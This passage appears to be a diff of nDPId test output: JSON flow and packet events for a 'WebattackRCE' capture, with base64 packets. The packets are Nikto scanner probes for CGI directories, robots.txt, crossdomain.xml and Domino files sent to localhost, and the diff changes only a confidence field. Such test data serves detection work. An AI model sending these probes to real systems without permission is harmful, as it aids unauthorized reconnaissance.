00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} 
+01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7580000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} 
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7580000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 